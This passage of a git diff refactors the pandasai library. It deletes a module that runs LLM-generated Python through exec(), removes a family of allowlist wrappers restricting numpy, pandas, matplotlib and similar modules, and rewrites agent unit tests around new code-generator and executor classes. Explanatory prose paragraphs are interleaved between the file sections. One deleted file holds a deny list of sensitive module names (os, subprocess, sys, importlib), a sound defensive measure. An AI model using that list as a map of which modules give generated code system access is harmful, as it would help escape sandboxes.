- f"[retry number: {retry_count}]",
- level=logging.WARNING,
- )
-
-                # TODO - Move this implementation to the main execute function
-                # Temporarily done for test cases; this should be fixed and moved to the main function
- code_to_run = self._retry_run_code(
- code_to_run, self.context, self.logger, e
- )
-
- return LogicUnitOutput(
- result,
- True,
- "Code Executed Successfully",
- {"content_type": "response", "value": ResponseSerializer.serialize(result)},
- final_track_output=True,
- )
-
- def execute_code(self, code: str, context: CodeExecutionContext) -> Any:
- """
- Execute the python code generated by LLMs to answer the question
- about the input dataframe. Run the code in the current context and return the
- result.
-
- Args:
- code (str): Python code to execute.
- context (CodeExecutionContext): Code Execution Context
- with prompt id.
-
- Returns:
- Any: The result of the code execution. The type of the result depends
- on the generated code.
-
- """
-        # List the required dfs, so we can avoid running the connectors
- # if the code does not need them
- dfs = self._required_dfs(code)
- environment: dict = get_environment(
- self._additional_dependencies,
- secure=self._config.security in ["standard", "advanced"],
- )
- environment["dfs"] = self._get_originals(dfs)
- if len(environment["dfs"]) == 1:
- environment["df"] = environment["dfs"][0]
-
- if self._config.direct_sql:
- environment["execute_sql_query"] = self._dfs[0].execute_sql_query
-
- # Execute the code
- exec(code, environment)
-
- # Get the result
- if "result" not in environment:
- raise NoResultFoundError("No result returned")
-
- return environment["result"]
-
- def _required_dfs(self, code: str) -> List[str]:
- """
-        List the indexes of the DataFrames that are needed to execute the code. The goal
-        is to avoid running the connectors if the code does not need them.
-
- Args:
- code (str): Python code to execute
-
- Returns:
-            List[int]: A list of the indexes of the DataFrames that are needed to execute
- the code.
- """
-
- # Sometimes GPT-3.5/4 use a for loop to iterate over the dfs (even if there is only one)
- # or they concatenate the dfs. In this case we need all the dfs
- if "for df in dfs" in code or "pd.concat(dfs" in code:
- return self._dfs
-
- required_dfs = []
- for i, df in enumerate(self._dfs):
- if f"dfs[{i}]" in code:
- required_dfs.append(df)
- else:
- required_dfs.append(None)
- return required_dfs or self._dfs
-
- # def _get_originals(self, dfs):
- # """
- # Get original dfs
-
- # Args:
- # dfs (list): List of dfs
-
- # Returns:
- # list: List of dfs
- # """
- # original_dfs = []
- # for df in dfs:
- # # TODO - Check why this None check is there
- # if df is None:
- # original_dfs.append(None)
- # continue
-
- # if isinstance(df, pd.DataFrame):
- # original_dfs.append(df)
- # else:
- # # Execute to fetch only if not dataframe
- # df.execute()
- # original_dfs.append(df.pandas_df)
-
- # return original_dfs
-
- def _retry_run_code(
- self,
- code: str,
- context: PipelineContext,
- logger: Logger,
- e: Exception,
- ) -> str:
- """
-        A method to retry the code execution with the error-correction framework.
-
- Args:
- code (str): A python code
- context (PipelineContext) : Pipeline Context
- logger (Logger) : Logger
-            e (Exception): An exception
-
- Returns (str): A python code
- """
- if self.on_retry:
- return self.on_retry(code, e)
- else:
- raise e
-
- @staticmethod
- def _tokenize_operand(operand_node: ast.expr) -> Generator[str, None, None]:
- """
- Utility generator function to get subscript slice constants.
-
- Args:
- operand_node (ast.expr):
- The node to be tokenized.
- Yields:
- str: Token string.
-
- Examples:
- >>> code = '''
- ... foo = [1, [2, 3], [[4, 5], [6, 7]]]
- ... print(foo[2][1][0])
- ... '''
- >>> tree = ast.parse(code)
-            >>> res = CodeExecution._tokenize_operand(tree.body[1].value.args[0])
- >>> print(list(res))
- ['foo', 2, 1, 0]
- """
- if isinstance(operand_node, ast.Call):
- yield operand_node.func.attr
-
- if isinstance(operand_node, ast.Subscript):
- slice_ = operand_node.slice.value
- yield from CodeExecution._tokenize_operand(operand_node.value)
- yield slice_
-
- if isinstance(operand_node, ast.Name):
- yield operand_node.id
-
- if isinstance(operand_node, ast.Constant):
- yield operand_node.value
-
- @staticmethod
- def _get_df_id_by_nearest_assignment(
- current_lineno: int, assignments: list[ast.Assign], target_name: str
- ):
- """
- Utility function to get df label by finding the nearest assignment.
-
- Sort assignment nodes list (copy of the list) by line number.
- Iterate over the assignment nodes list. If the assignment node's value
-        looks like `dfs[<index>]` and the target label equals `target_name`,
-        set `nearest_assignment` to "dfs[<index>]".
-
- Args:
- current_lineno (int): Number of the current processed line.
- assignments (list[ast.Assign]): List of assignment nodes.
- target_name (str): Name of the target variable. The assignment
- node is supposed to assign to this name.
-
- Returns:
-            str: The string representing the df label, looks like "dfs[<index>]".
- """
- nearest_assignment = None
- assignments = sorted(assignments, key=lambda node: node.lineno)
- for assignment in assignments:
- if assignment.lineno > current_lineno:
- return nearest_assignment
- try:
- is_subscript = isinstance(assignment.value, ast.Subscript)
- dfs_on_the_right = assignment.value.value.id == "dfs"
- assign_to_target = assignment.targets[0].id == target_name
- if is_subscript and dfs_on_the_right and assign_to_target:
- nearest_assignment = f"dfs[{assignment.value.slice.value}]"
- except AttributeError:
- continue
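The error-correction behavior removed with this file is, at its core, a bounded retry loop around execution. A distilled sketch of that control flow; the function names are illustrative and not part of the new API:

```python
def run_with_retries(code, execute, correct, max_retries=3):
    """Execute code; on failure, ask `correct` for a fixed version, up to max_retries."""
    for attempt in range(max_retries + 1):
        try:
            return execute(code)
        except Exception as exc:
            if attempt == max_retries:
                raise
            code = correct(code, exc)  # e.g. re-prompt the LLM with the traceback
```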
diff --git a/pandasai/pipelines/chat/validate_pipeline_input.py b/pandasai/pipelines/chat/validate_pipeline_input.py
deleted file mode 100644
index bb197fba0..000000000
--- a/pandasai/pipelines/chat/validate_pipeline_input.py
+++ /dev/null
@@ -1,29 +0,0 @@
-from __future__ import annotations
-from typing import Any
-from pandasai.pipelines.logic_unit_output import LogicUnitOutput
-
-from ..base_logic_unit import BaseLogicUnit
-from ..pipeline_context import PipelineContext
-
-
-class ValidatePipelineInput(BaseLogicUnit):
- """
- Validates pipeline input
- """
-
- pass
-
- def execute(self, input: Any, **kwargs) -> Any:
- """
- This method validates pipeline context and configs
-
- :param input: Your input data.
- :param kwargs: A dictionary of keyword arguments.
- - 'logger' (any): The logger for logging.
- - 'config' (Config): Global configurations for the test
- - 'context' (any): The execution context.
-
- :return: The result of the execution.
- """
- self.context: PipelineContext = kwargs.get("context")
- return LogicUnitOutput(input, True, "Input Validation Successful")
diff --git a/pandasai/safe_libs/base_restricted_module.py b/pandasai/safe_libs/base_restricted_module.py
deleted file mode 100644
index 65e1864bd..000000000
--- a/pandasai/safe_libs/base_restricted_module.py
+++ /dev/null
@@ -1,27 +0,0 @@
-class BaseRestrictedModule:
- def _wrap_function(self, func):
- def wrapper(*args, **kwargs):
- # Check for any suspicious arguments that might be used for importing
- for arg in args + tuple(kwargs.values()):
- if isinstance(arg, str) and any(
- module == arg.lower()
- for module in ["io", "os", "subprocess", "sys", "importlib"]
- ):
- raise SecurityError(
- f"Potential security risk: '{arg}' is not allowed"
- )
- return func(*args, **kwargs)
-
- return wrapper
-
- def _wrap_class(self, cls):
- class WrappedClass(cls):
- def __getattribute__(self, name):
- attr = super().__getattribute__(name)
- return self._wrap_function(self, attr) if callable(attr) else attr
-
- return WrappedClass
-
-
-class SecurityError(Exception):
- pass
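This file is the pre-rename copy of `base_restricted_module.py` and still carries the `self._wrap_function(self, attr)` bug fixed earlier in this patch. For reference, its argument screening reduces to the following sketch (`screen_args` is an illustrative name):

```python
class SecurityError(Exception):
    pass

def screen_args(*args, **kwargs):
    """Reject string arguments that name sensitive modules, as _wrap_function does."""
    blocked = {"io", "os", "subprocess", "sys", "importlib"}
    for arg in args + tuple(kwargs.values()):
        if isinstance(arg, str) and arg.lower() in blocked:
            raise SecurityError(f"Potential security risk: '{arg}' is not allowed")

screen_args("data.csv")  # fine
# screen_args("os")      # would raise SecurityError
```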
diff --git a/pandasai/safe_libs/restricted_base64.py b/pandasai/safe_libs/restricted_base64.py
deleted file mode 100644
index eb305885e..000000000
--- a/pandasai/safe_libs/restricted_base64.py
+++ /dev/null
@@ -1,21 +0,0 @@
-import base64
-
-from .base_restricted_module import BaseRestrictedModule
-
-
-class RestrictedBase64(BaseRestrictedModule):
- def __init__(self):
- self.allowed_functions = [
- "b64encode", # Safe function to encode data into base64
- "b64decode", # Safe function to decode base64 encoded data
- ]
-
- # Bind the allowed functions to the object
- for func in self.allowed_functions:
- if hasattr(base64, func):
- setattr(self, func, self._wrap_function(getattr(base64, func)))
-
- def __getattr__(self, name):
- if name not in self.allowed_functions:
- raise AttributeError(f"'{name}' is not allowed in RestrictedBase64")
- return getattr(base64, name)
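This module and the six sibling `Restricted*` modules deleted below all follow the same allowlist pattern: wrapped copies of permitted callables are bound in `__init__`, and `__getattr__` rejects anything off the list. A generic sketch of the pattern; the `make_restricted` helper is illustrative only:

```python
import base64

def make_restricted(module, allowed):
    """Expose only an allowlist of a module's attributes."""
    class Restricted:
        def __getattr__(self, name):
            if name not in allowed:
                raise AttributeError(f"'{name}' is not allowed")
            return getattr(module, name)
    return Restricted()

safe_b64 = make_restricted(base64, {"b64encode", "b64decode"})
print(safe_b64.b64encode(b"pandasai"))  # allowed
# safe_b64.encodebytes would raise AttributeError
```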
diff --git a/pandasai/safe_libs/restricted_datetime.py b/pandasai/safe_libs/restricted_datetime.py
deleted file mode 100644
index 0fc48290a..000000000
--- a/pandasai/safe_libs/restricted_datetime.py
+++ /dev/null
@@ -1,64 +0,0 @@
-import datetime
-
-from .base_restricted_module import BaseRestrictedModule
-
-
-class RestrictedDatetime(BaseRestrictedModule):
- def __init__(self):
- self.allowed_attributes = [
- # Classes
- "date",
- "time",
- "datetime",
- "timedelta",
- "tzinfo",
- "timezone",
- # Constants
- "MINYEAR",
- "MAXYEAR",
- # Time zone constants
- "UTC",
- # Functions
- "now",
- "utcnow",
- "today",
- "fromtimestamp",
- "utcfromtimestamp",
- "fromordinal",
- "combine",
- "strptime",
- # Timedelta operations
- "timedelta",
- # Date operations
- "weekday",
- "isoweekday",
- "isocalendar",
- "isoformat",
- "ctime",
- "strftime",
- "year",
- "month",
- "day",
- "hour",
- "minute",
- "second",
- "microsecond",
- # Time operations
- "replace",
- "tzname",
- "dst",
- "utcoffset",
- # Comparison methods
- "min",
- "max",
- ]
-
- for attr in self.allowed_attributes:
- if hasattr(datetime, attr):
- setattr(self, attr, self._wrap_function(getattr(datetime, attr)))
-
- def __getattr__(self, name):
- if name not in self.allowed_attributes:
- raise AttributeError(f"'{name}' is not allowed in RestrictedDatetime")
-
- return getattr(datetime, name)
diff --git a/pandasai/safe_libs/restricted_json.py b/pandasai/safe_libs/restricted_json.py
deleted file mode 100644
index 7f13b6112..000000000
--- a/pandasai/safe_libs/restricted_json.py
+++ /dev/null
@@ -1,23 +0,0 @@
-import json
-
-from .base_restricted_module import BaseRestrictedModule
-
-
-class RestrictedJson(BaseRestrictedModule):
- def __init__(self):
- self.allowed_functions = [
- "load",
- "loads",
- "dump",
- "dumps",
- ]
-
- # Bind the allowed functions to the object
- for func in self.allowed_functions:
- if hasattr(json, func):
- setattr(self, func, self._wrap_function(getattr(json, func)))
-
- def __getattr__(self, name):
- if name not in self.allowed_functions:
- raise AttributeError(f"'{name}' is not allowed in RestrictedJson")
- return getattr(json, name)
diff --git a/pandasai/safe_libs/restricted_matplotlib.py b/pandasai/safe_libs/restricted_matplotlib.py
deleted file mode 100644
index 82635bfda..000000000
--- a/pandasai/safe_libs/restricted_matplotlib.py
+++ /dev/null
@@ -1,76 +0,0 @@
-import matplotlib.axes as axes
-import matplotlib.figure as figure
-import matplotlib.pyplot as plt
-
-from .base_restricted_module import BaseRestrictedModule
-
-
-class RestrictedMatplotlib(BaseRestrictedModule):
- def __init__(self):
- self.allowed_attributes = [
- # Figure and Axes creation
- "figure",
- "subplots",
- "subplot",
- # Plotting functions
- "plot",
- "scatter",
- "bar",
- "barh",
- "hist",
- "boxplot",
- "violinplot",
- "pie",
- "errorbar",
- "contour",
- "contourf",
- "imshow",
- "pcolor",
- "pcolormesh",
- # Axis manipulation
- "xlabel",
- "ylabel",
- "title",
- "legend",
- "xlim",
- "ylim",
- "axis",
- "xticks",
- "yticks",
- "grid",
- "axhline",
- "axvline",
- # Colorbar
- "colorbar",
- # Text and annotations
- "text",
- "annotate",
- # Styling
- "style",
- # Save and show
- "show",
- "savefig",
- # Color maps
- "get_cmap",
- # 3D plotting
- "axes3d",
- # Utility functions
- "close",
- "clf",
- "cla",
- # Constants
- "rcParams",
- ]
-
- for attr in self.allowed_attributes:
- if hasattr(plt, attr):
- setattr(self, attr, self._wrap_function(getattr(plt, attr)))
-
- # Special handling for figure and axes
- self.Figure = self._wrap_class(figure.Figure)
- self.Axes = self._wrap_class(axes.Axes)
-
- def __getattr__(self, name):
- if name not in self.allowed_attributes:
- raise AttributeError(f"'{name}' is not allowed in RestrictedMatplotlib")
- return getattr(plt, name)
diff --git a/pandasai/safe_libs/restricted_numpy.py b/pandasai/safe_libs/restricted_numpy.py
deleted file mode 100644
index 855fb70d6..000000000
--- a/pandasai/safe_libs/restricted_numpy.py
+++ /dev/null
@@ -1,182 +0,0 @@
-import numpy as np
-
-from .base_restricted_module import BaseRestrictedModule
-
-
-class RestrictedNumpy(BaseRestrictedModule):
- def __init__(self):
- self.allowed_attributes = [
- # Array creation
- "array",
- "zeros",
- "ones",
- "empty",
- "full",
- "zeros_like",
- "ones_like",
- "empty_like",
- "full_like",
- "eye",
- "identity",
- "diag",
- "arange",
- "linspace",
- "logspace",
- "geomspace",
- "fromfunction",
- "fromiter",
- # Array manipulation
- "reshape",
- "ravel",
- "flatten",
- "moveaxis",
- "rollaxis",
- "swapaxes",
- "transpose",
- "split",
- "hsplit",
- "vsplit",
- "dsplit",
- "stack",
- "column_stack",
- "dstack",
- "row_stack",
- "concatenate",
- "vstack",
- "hstack",
- "tile",
- "repeat",
- # Mathematical operations
- "add",
- "subtract",
- "multiply",
- "divide",
- "power",
- "mod",
- "remainder",
- "divmod",
- "negative",
- "positive",
- "absolute",
- "fabs",
- "rint",
- "floor",
- "ceil",
- "trunc",
- "exp",
- "expm1",
- "exp2",
- "log",
- "log10",
- "log2",
- "log1p",
- "sqrt",
- "square",
- "cbrt",
- "reciprocal",
- # Trigonometric functions
- "sin",
- "cos",
- "tan",
- "arcsin",
- "arccos",
- "arctan",
- "arctan2",
- "hypot",
- "sinh",
- "cosh",
- "tanh",
- "arcsinh",
- "arccosh",
- "arctanh",
- "deg2rad",
- "rad2deg",
- # Statistical functions
- "mean",
- "average",
- "median",
- "std",
- "var",
- "min",
- "max",
- "argmin",
- "argmax",
- "sum",
- "prod",
- "percentile",
- "quantile",
- "histogram",
- "histogram2d",
- "histogramdd",
- "bincount",
- "digitize",
- # Linear algebra
- "dot",
- "vdot",
- "inner",
- "outer",
- "matmul",
- "tensordot",
- "einsum",
- "trace",
- "diagonal",
- # Sorting and searching
- "sort",
- "argsort",
- "partition",
- "argpartition",
- "searchsorted",
- "nonzero",
- "where",
- "extract",
- # Logic functions
- "all",
- "any",
- "greater",
- "greater_equal",
- "less",
- "less_equal",
- "equal",
- "not_equal",
- "logical_and",
- "logical_or",
- "logical_not",
- "logical_xor",
- "isfinite",
- "isinf",
- "isnan",
- "isneginf",
- "isposinf",
- # Set operations
- "unique",
- "intersect1d",
- "union1d",
- "setdiff1d",
- "setxor1d",
- # Basic array information
- "shape",
- "size",
- "ndim",
- "dtype",
- # Utility functions
- "clip",
- "round",
- "sign",
- "conj",
- "real",
- "imag",
- "copy",
- "asarray",
- "asanyarray",
- "ascontiguousarray",
- "asfortranarray",
- ]
-
- for attr in self.allowed_attributes:
- if hasattr(np, attr):
- setattr(self, attr, self._wrap_function(getattr(np, attr)))
-
- def __getattr__(self, name):
- if name not in self.allowed_attributes:
- raise AttributeError(f"'{name}' is not allowed in RestrictedNumPy")
- return getattr(np, name)
diff --git a/pandasai/safe_libs/restricted_pandas.py b/pandasai/safe_libs/restricted_pandas.py
deleted file mode 100644
index 75e5a083c..000000000
--- a/pandasai/safe_libs/restricted_pandas.py
+++ /dev/null
@@ -1,110 +0,0 @@
-import pandas as pd
-
-from .base_restricted_module import BaseRestrictedModule
-
-
-class RestrictedPandas(BaseRestrictedModule):
- def __init__(self):
- self.allowed_attributes = [
- # DataFrame creation and basic operations
- "DataFrame",
- "Series",
- "concat",
- "merge",
- "join",
- # Data manipulation
- "groupby",
- "pivot",
- "pivot_table",
- "melt",
- "crosstab",
- "cut",
- "qcut",
- "get_dummies",
- "factorize",
- # Indexing and selection
- "loc",
- "iloc",
- "at",
- "iat",
- # Function application
- "apply",
- "applymap",
- "pipe",
- # Reshaping and sorting
- "sort_values",
- "sort_index",
- "nlargest",
- "nsmallest",
- "rank",
- "reindex",
- "reset_index",
- "set_index",
- # Computations / descriptive stats
- "sum",
- "prod",
- "min",
- "max",
- "mean",
- "median",
- "var",
- "std",
- "sem",
- "skew",
- "kurt",
- "quantile",
- "count",
- "nunique",
- "value_counts",
- "describe",
- "cov",
- "corr",
- # Date functionality
- "to_datetime",
- "date_range",
- # String methods
- "str",
- # Categorical methods
- "Categorical",
- "cut",
- "qcut",
- # Plotting (if visualization is allowed)
- "plot",
- # Utility functions
- "isnull",
- "notnull",
- "isna",
- "notna",
- "fillna",
- "dropna",
- "replace",
- "astype",
- "copy",
- "drop_duplicates",
- # Window functions
- "rolling",
- "expanding",
- "ewm",
- # Time series functionality
- "resample",
- "shift",
- "diff",
- "pct_change",
- # Aggregation
- "agg",
- "aggregate",
- ]
-
- for attr in self.allowed_attributes:
- if hasattr(pd, attr):
- setattr(self, attr, self._wrap_function(getattr(pd, attr)))
- elif attr in ["loc", "iloc", "at", "iat"]:
- # These are properties, not functions
- setattr(
- self, attr, property(lambda self, a=attr: getattr(pd.DataFrame, a))
- )
-
- def __getattr__(self, name):
- if name not in self.allowed_attributes:
- raise AttributeError(f"'{name}' is not allowed in RestrictedPandas")
- return getattr(pd, name)
diff --git a/pandasai/safe_libs/restricted_seaborn.py b/pandasai/safe_libs/restricted_seaborn.py
deleted file mode 100644
index a5ef4c6e8..000000000
--- a/pandasai/safe_libs/restricted_seaborn.py
+++ /dev/null
@@ -1,74 +0,0 @@
-import seaborn as sns
-
-from .base_restricted_module import BaseRestrictedModule
-
-
-class RestrictedSeaborn(BaseRestrictedModule):
- def __init__(self):
- self.allowed_attributes = [
- # Plot functions
- "scatterplot",
- "lineplot",
- "relplot",
- "displot",
- "histplot",
- "kdeplot",
- "ecdfplot",
- "rugplot",
- "distplot",
- "boxplot",
- "violinplot",
- "boxenplot",
- "stripplot",
- "swarmplot",
- "barplot",
- "countplot",
- "heatmap",
- "clustermap",
- "regplot",
- "lmplot",
- "residplot",
- "jointplot",
- "pairplot",
- "catplot",
- # Axis styling
- "set_style",
- "set_context",
- "set_palette",
- "despine",
- "move_legend",
- "axes_style",
- "plotting_context",
- # Color palette functions
- "color_palette",
- "palplot",
- "cubehelix_palette",
- "light_palette",
- "dark_palette",
- "diverging_palette",
- # Utility functions
- "load_dataset",
- # Figure-level interface
- "FacetGrid",
- "PairGrid",
- "JointGrid",
- # Regression and statistical estimation
- "lmplot",
- "regplot",
- "residplot",
- # Matrix plots
- "heatmap",
- "clustermap",
- # Miscellaneous
- "kdeplot",
- "rugplot",
- ]
-
- for attr in self.allowed_attributes:
- if hasattr(sns, attr):
- setattr(self, attr, self._wrap_function(getattr(sns, attr)))
-
- def __getattr__(self, name):
- if name not in self.allowed_attributes:
- raise AttributeError(f"'{name}' is not allowed in RestrictedSeaborn")
- return getattr(sns, name)
diff --git a/pandasai/schemas/__init__.py b/pandasai/schemas/__init__.py
deleted file mode 100644
index 538da3b7b..000000000
--- a/pandasai/schemas/__init__.py
+++ /dev/null
@@ -1 +0,0 @@
-""" Schemas """
diff --git a/tests/unit_tests/agent/test_agent.py b/tests/unit_tests/agent/test_agent.py
index 92924d20b..84db923a5 100644
--- a/tests/unit_tests/agent/test_agent.py
+++ b/tests/unit_tests/agent/test_agent.py
@@ -5,18 +5,20 @@
import pandas as pd
import pytest
-from pandasai.agent.agent import Agent
+from pandasai.agent.base import Agent
+from pandasai.core.prompts.base import BasePrompt
from pandasai.llm.fake import FakeLLM
-from pandasai.prompts.base import BasePrompt
from pandasai.helpers.dataframe_serializer import DataframeSerializerType
+from pandasai.dataframe.base import DataFrame
+from pandasai.exceptions import MaliciousQueryError
class TestAgent:
"Unit tests for Agent class"
@pytest.fixture
- def sample_df(self) -> pd.DataFrame:
- return pd.DataFrame(
+ def sample_df(self) -> DataFrame:
+ return DataFrame(
{
"country": ["United States", "United Kingdom", "Japan", "China"],
"gdp": [
@@ -52,11 +54,11 @@ def test_constructor(self, sample_df, config):
agent_2 = Agent([sample_df], config)
# test multiple agents instances data overlap
- agent_1.context.memory.add("Which country has the highest gdp?", True)
- memory = agent_1.context.memory.all()
+ agent_1._state.memory.add("Which country has the highest gdp?", True)
+ memory = agent_1._state.memory.all()
assert len(memory) == 1
- memory = agent_2.context.memory.all()
+ memory = agent_2._state.memory.all()
assert len(memory) == 0
def test_chat(self, sample_df, config):
@@ -70,146 +72,328 @@ def test_chat(self, sample_df, config):
assert isinstance(response, str)
assert response == "United States has the highest gdp"
- def test_code_generation(self, sample_df, config):
+ @patch("pandasai.agent.base.CodeGenerator")
+ def test_code_generation(self, mock_generate_code, sample_df, config):
# Create an Agent instance for testing
- agent = Agent(sample_df, config)
- agent.pipeline.code_generation_pipeline.run = Mock()
- agent.pipeline.code_generation_pipeline.run.return_value = (
- "print(United States has the highest gdp)"
+ mock_generate_code.generate_code.return_value = (
+ "print(United States has the highest gdp)",
+ [],
)
+ agent = Agent(sample_df, config)
+ agent._code_generator = mock_generate_code
+
# Test the chat function
- response = agent.generate_code("Which country has the highest gdp?")
- assert agent.pipeline.code_generation_pipeline.run.called
+ response, additional_dependencies = agent.generate_code(
+ "Which country has the highest gdp?"
+ )
+ assert agent._code_generator.generate_code.called
assert isinstance(response, str)
+ assert isinstance(additional_dependencies, list)
+
assert response == "print(United States has the highest gdp)"
- def test_code_generation_failure(self, sample_df, config):
- # Create an Agent instance for testing
- agent = Agent(sample_df, config)
- agent.pipeline.code_generation_pipeline.run = Mock()
- agent.pipeline.code_generation_pipeline.run.side_effect = Exception(
- "Raise an exception"
+ @patch("pandasai.agent.base.CodeGenerator")
+ def test_generate_code_with_cache_hit(self, mock_generate_code, agent: Agent):
+ # Set up the cache to return a pre-cached response
+ cached_code = "print('Cached result: US has the highest GDP.')"
+ agent._state.config.enable_cache = True
+ agent._state.cache.get = MagicMock(return_value=cached_code)
+
+        # On a cache hit the generator is bypassed; only validate_and_clean_code runs
+        mock_generate_code.validate_and_clean_code.return_value = (
+            "print('Cached result: US has the highest GDP.')",
+            [],
+        )
+        agent._code_generator = mock_generate_code
- # Test the chat function
- response = agent.generate_code("Which country has the highest gdp?")
- assert agent.pipeline.code_generation_pipeline.run.called
- assert (
- response
- == "Unfortunately, I was not able to answer your question, because of the following error:\n\nRaise an exception\n"
+
+ # Generate code
+ response, _ = agent.generate_code("Which country has the highest GDP?")
+
+ # Check that the cached code was used
+ assert response == cached_code
+        mock_generate_code.validate_and_clean_code.assert_called_with(cached_code)
+
+ @patch("pandasai.agent.base.CodeGenerator")
+ def test_generate_code_with_cache_miss(self, mock_generate_code, agent: Agent):
+ # Set up the cache to return no cached response
+ agent._state.config.enable_cache = True
+ agent._state.cache.get = MagicMock(return_value=None)
+
+ # Mock the code generator to return a new response
+ mock_generate_code.generate_code.return_value = (
+ "print('New result: US has the highest GDP.')",
+ [],
)
+ agent._code_generator = mock_generate_code
- def test_code_execution(self, sample_df, config):
- # Create an Agent instance for testing
- agent = Agent(sample_df, config)
- agent.pipeline.code_execution_pipeline.run = Mock()
- agent.pipeline.code_execution_pipeline.run.side_effect = Exception(
- "Raise an exception"
+ # Generate code
+ response, additional_dependencies = agent.generate_code(
+ "Which country has the highest GDP?"
+ )
+
+ # Check that the cache miss triggered new code generation
+ assert mock_generate_code.generate_code.called
+ assert response == "print('New result: US has the highest GDP.')"
+
+ @patch("pandasai.agent.base.CodeGenerator")
+ def test_generate_code_with_direct_sql(self, mock_generate_code, agent: Agent):
+ # Enable direct SQL in the config
+ agent._state.config.direct_sql = True
+
+ # Mock the code generator to return a SQL-based response
+ mock_generate_code.generate_code.return_value = (
+ "SELECT country FROM countries ORDER BY gdp DESC LIMIT 1;",
+ [],
)
- response = agent.execute_code("print(United States has the highest gdp)")
- assert agent.pipeline.code_execution_pipeline.run.called
- assert (
- response
- == "Unfortunately, I was not able to answer your question, because of the following error:\n\nRaise an exception\n"
+ agent._code_generator = mock_generate_code
+
+ # Generate code
+ response, additional_dependencies = agent.generate_code(
+ "Which country has the highest GDP?"
)
- def test_code_execution_failure(self, sample_df, config):
- # Create an Agent instance for testing
- agent = Agent(sample_df, config)
- agent.pipeline.code_execution_pipeline.run = Mock()
- agent.pipeline.code_execution_pipeline.run.return_value = (
- "United States has the highest gdp"
+ # Check that the SQL-specific prompt was used
+ assert mock_generate_code.generate_code.called
+ assert response == "SELECT country FROM countries ORDER BY gdp DESC LIMIT 1;"
+
+ @patch("pandasai.agent.base.CodeGenerator")
+ def test_generate_code_logs_generation(self, mock_generate_code, agent: Agent):
+ # Mock the logger
+ agent._state.logger.log = MagicMock()
+
+ # Mock the code generator
+ mock_generate_code.generate_code.return_value = (
+ "print('Logging test.')",
+ [],
+ )
+ agent._code_generator = mock_generate_code
+
+ # Generate code
+ response, additional_dependencies = agent.generate_code(
+ "Test logging during code generation."
+ )
+
+ # Verify logger was called
+ agent._state.logger.log.assert_any_call("Generating new code...")
+ assert mock_generate_code.generate_code.called
+ assert response == "print('Logging test.')"
+
+ @patch("pandasai.agent.base.CodeGenerator")
+ def test_generate_code_updates_last_prompt(self, mock_generate_code, agent: Agent):
+ # Mock the code generator
+ prompt = "Cust om SQL prompt"
+ mock_generate_code.generate_code.return_value = (
+ "print('Prompt test.')",
+ [],
+ )
+ agent._state.last_prompt_used = None
+ agent._code_generator = mock_generate_code
+
+ # Mock the prompt creation function
+ with patch("pandasai.agent.base.get_chat_prompt", return_value=prompt):
+ response, additional_dependencies = agent.generate_code(
+ "Which country has the highest GDP?"
+ )
+
+ # Verify the last prompt used is updated
+ assert agent._state.last_prompt_used == prompt
+ assert mock_generate_code.generate_code.called
+ assert response == "print('Prompt test.')"
+
+ @patch("pandasai.agent.base.CodeExecutor")
+ def test_execute_code_successful_execution(self, mock_code_executor, agent: Agent):
+ # Mock CodeExecutor to return a successful result
+ mock_code_executor.return_value.execute_and_return_result.return_value = {
+ "result": "Execution successful"
+ }
+ mock_code_executor.return_value.add_to_env = MagicMock()
+
+ # Execute the code
+ code = "print('Hello, World!')"
+ additional_dependencies = ["numpy"]
+ result = agent.execute_code(code, additional_dependencies)
+
+ # Verify the code was executed and the result is correct
+ assert result == {"result": "Execution successful"}
+ mock_code_executor.return_value.add_to_env.assert_any_call(
+ "dfs", agent._state.dfs
+ )
+ mock_code_executor.return_value.execute_and_return_result.assert_called_with(
+ code
+ )
+
+ @patch("pandasai.agent.base.CodeExecutor")
+ def test_execute_code_with_direct_sql(self, mock_code_executor, agent: Agent):
+ # Enable direct SQL in the config
+ agent._state.config.direct_sql = True
+
+ # Mock CodeExecutor to return a result
+ mock_code_executor.return_value.execute_and_return_result.return_value = {
+ "result": "SQL Execution successful"
+ }
+ mock_code_executor.return_value.add_to_env = MagicMock()
+
+ # Mock SQL method in the DataFrame
+ agent._state.dfs[0].execute_sql_query = MagicMock()
+
+ # Execute the code
+ code = "execute_sql_query('SELECT * FROM table')"
+ additional_dependencies = []
+ result = agent.execute_code(code, additional_dependencies)
+
+ # Verify the SQL execution environment was set up correctly
+ assert result == {"result": "SQL Execution successful"}
+ mock_code_executor.return_value.add_to_env.assert_any_call(
+ "execute_sql_query", agent._state.dfs[0].execute_sql_query
+ )
+ mock_code_executor.return_value.execute_and_return_result.assert_called_with(
+ code
+ )
+
+ @patch("pandasai.agent.base.CodeExecutor")
+ def test_execute_code_logs_execution(self, mock_code_executor, agent: Agent):
+ # Mock the logger
+ agent._state.logger.log = MagicMock()
+
+ # Mock CodeExecutor to return a result
+ mock_code_executor.return_value.execute_and_return_result.return_value = {
+ "result": "Logging test successful"
+ }
+
+ # Execute the code
+ code = "print('Logging test')"
+ additional_dependencies = []
+ result = agent.execute_code(code, additional_dependencies)
+
+ # Verify the logger was called with the correct message
+ agent._state.logger.log.assert_called_with(f"Executing code: {code}")
+ assert result == {"result": "Logging test successful"}
+ mock_code_executor.return_value.execute_and_return_result.assert_called_with(
+ code
+ )
+
+ @patch("pandasai.agent.base.CodeExecutor")
+ def test_execute_code_with_missing_dependencies(
+ self, mock_code_executor, agent: Agent
+ ):
+ # Mock CodeExecutor to simulate a missing dependency error
+ mock_code_executor.return_value.execute_and_return_result.side_effect = (
+ ImportError("Missing dependency: pandas")
+ )
+
+ # Execute the code
+ code = "import pandas as pd; print(pd.DataFrame())"
+ additional_dependencies = ["pandas"]
+
+ with pytest.raises(ImportError):
+ agent.execute_code(code, additional_dependencies)
+
+ # Verify the CodeExecutor was called despite the missing dependency
+ mock_code_executor.return_value.execute_and_return_result.assert_called_with(
+ code
+ )
+
+ @patch("pandasai.agent.base.CodeExecutor")
+ def test_execute_code_handles_empty_code(self, mock_code_executor, agent: Agent):
+ # Mock CodeExecutor to return an empty result
+ mock_code_executor.return_value.execute_and_return_result.return_value = {}
+
+ # Execute empty code
+ code = ""
+ additional_dependencies = []
+ result = agent.execute_code(code, additional_dependencies)
+
+ # Verify the result is empty and the executor was still invoked with the empty code
+ assert result == {}
+ mock_code_executor.return_value.execute_and_return_result.assert_called_with(
+ code
)
- response = agent.execute_code("print(United States has the highest gdp)")
- assert agent.pipeline.code_execution_pipeline.run.called
- assert isinstance(response, str)
- assert response == "United States has the highest gdp"
def test_start_new_conversation(self, sample_df, config):
agent = Agent(sample_df, config, memory_size=10)
- agent.context.memory.add("Which country has the highest gdp?", True)
- memory = agent.context.memory.all()
